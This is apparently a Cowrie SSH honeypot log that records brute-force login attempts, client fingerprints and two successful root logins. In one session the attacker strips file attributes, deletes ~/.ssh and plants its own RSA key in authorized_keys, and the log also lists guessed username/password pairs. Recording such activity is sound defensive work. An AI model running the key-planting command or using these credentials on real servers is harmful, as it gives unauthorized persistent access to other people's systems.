{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51690,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d3d66ead7f8","protocol":"ssh","message":"New connection: 212.227.125.160:51690 (1.2.3.4:22) [session: 3d3d66ead7f8]","sensor":"my-vps","timestamp":"2025-08-31T04:17:53.176957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:17:53.886313Z","src_ip":"212.227.125.160","session":"3d3d66ead7f8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:17:53.887294Z","src_ip":"212.227.125.160","session":"3d3d66ead7f8"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker","message":"login attempt [docker/docker] failed","sensor":"my-vps","timestamp":"2025-08-31T04:17:54.432522Z","src_ip":"212.227.235.229","session":"491161b09f51"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123456789","message":"login attempt [odoo/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:17:56.238482Z","src_ip":"212.227.125.160","session":"3d3d66ead7f8"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:17:57.707253Z","src_ip":"212.227.125.160","session":"3d3d66ead7f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36078,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f047b40a2ed","protocol":"ssh","message":"New connection: 212.227.235.229:36078 (1.2.3.4:22) [session: 4f047b40a2ed]","sensor":"my-vps","timestamp":"2025-08-31T04:17:59.435684Z"}
{"eventid":"cowrie.session.closed","duration":"71.2","message":"Connection lost after 71.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:00.281076Z","src_ip":"212.227.235.229","session":"491161b09f51"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":34605,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6fcc3854154","protocol":"ssh","message":"New connection: 80.94.95.15:34605 (1.2.3.4:22) [session: d6fcc3854154]","sensor":"my-vps","timestamp":"2025-08-31T04:18:03.742857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:18:03.744049Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:18:03.810198Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon","message":"login attempt [solomon/solomon] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:04.153872Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:18:04.819847Z","src_ip":"212.227.235.229","session":"4f047b40a2ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:18:04.821129Z","src_ip":"212.227.235.229","session":"4f047b40a2ed"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon1","message":"login attempt [solomon/solomon1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:05.222330Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon123","message":"login attempt [solomon/solomon123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:06.291351Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon1234","message":"login attempt [solomon/solomon1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:07.360260Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.login.failed","username":"solomon","password":"solomon12345","message":"login attempt [solomon/solomon12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:08.427694Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:09.495224Z","src_ip":"80.94.95.15","session":"d6fcc3854154"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40896,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2bc3b82ffdd","protocol":"ssh","message":"New connection: 212.227.235.229:40896 (1.2.3.4:22) [session: c2bc3b82ffdd]","sensor":"my-vps","timestamp":"2025-08-31T04:18:31.081115Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55660,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a2869ed9f04","protocol":"ssh","message":"New connection: 212.227.235.229:55660 (1.2.3.4:22) [session: 8a2869ed9f04]","sensor":"my-vps","timestamp":"2025-08-31T04:18:31.321971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:18:31.322825Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:18:31.639906Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:18:31.986047Z","src_ip":"212.227.235.229","session":"c2bc3b82ffdd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:18:31.987316Z","src_ip":"212.227.235.229","session":"c2bc3b82ffdd"}
{"eventid":"cowrie.login.success","username":"root","password":"user12345678","message":"login attempt [root/user12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:18:33.078051Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:18:34.164982Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:18:34.165763Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:18:34.166758Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:34.293543Z","src_ip":"212.227.235.229","session":"4f047b40a2ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:34.485669Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:18:35.140646Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T04:18:35.141334Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T04:18:35.460954Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:35.461845Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45836,"dst_ip":"1.2.3.4","dst_port":22,"session":"110b26f80256","protocol":"ssh","message":"New connection: 212.227.235.229:45836 (1.2.3.4:22) [session: 110b26f80256]","sensor":"my-vps","timestamp":"2025-08-31T04:18:36.202726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:18:36.203662Z","src_ip":"212.227.235.229","session":"110b26f80256"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:18:36.514449Z","src_ip":"212.227.235.229","session":"110b26f80256"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34904,"dst_ip":"1.2.3.4","dst_port":22,"session":"d26110d79561","protocol":"ssh","message":"New connection: 212.227.125.160:34904 (1.2.3.4:22) [session: d26110d79561]","sensor":"my-vps","timestamp":"2025-08-31T04:18:37.150463Z"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password","message":"login attempt [odoo/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:37.568248Z","src_ip":"212.227.235.229","session":"c2bc3b82ffdd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:18:37.798299Z","src_ip":"212.227.235.229","session":"110b26f80256"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:39.110799Z","src_ip":"212.227.235.229","session":"110b26f80256"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:39.202629Z","src_ip":"212.227.235.229","session":"c2bc3b82ffdd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45852,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40c184b2fc3","protocol":"ssh","message":"New connection: 212.227.235.229:45852 (1.2.3.4:22) [session: f40c184b2fc3]","sensor":"my-vps","timestamp":"2025-08-31T04:18:39.425155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:18:39.426075Z","src_ip":"212.227.235.229","session":"f40c184b2fc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:18:39.740177Z","src_ip":"212.227.235.229","session":"f40c184b2fc3"}
{"eventid":"cowrie.session.closed","duration":"40.6","message":"Connection lost after 40.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:40.085194Z","src_ip":"212.227.235.229","session":"4f047b40a2ed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:18:41.394899Z","src_ip":"212.227.235.229","session":"f40c184b2fc3"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:41.704712Z","src_ip":"212.227.235.229","session":"8a2869ed9f04"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:18:41.709636Z","src_ip":"212.227.235.229","session":"f40c184b2fc3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:18:42.352835Z","src_ip":"212.227.125.160","session":"d26110d79561"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:18:42.353525Z","src_ip":"212.227.125.160","session":"d26110d79561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59128,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ca7198dc20b","protocol":"ssh","message":"New connection: 212.227.125.160:59128 (1.2.3.4:22) [session: 9ca7198dc20b]","sensor":"my-vps","timestamp":"2025-08-31T04:18:52.097443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:18:52.610934Z","src_ip":"212.227.125.160","session":"9ca7198dc20b"}
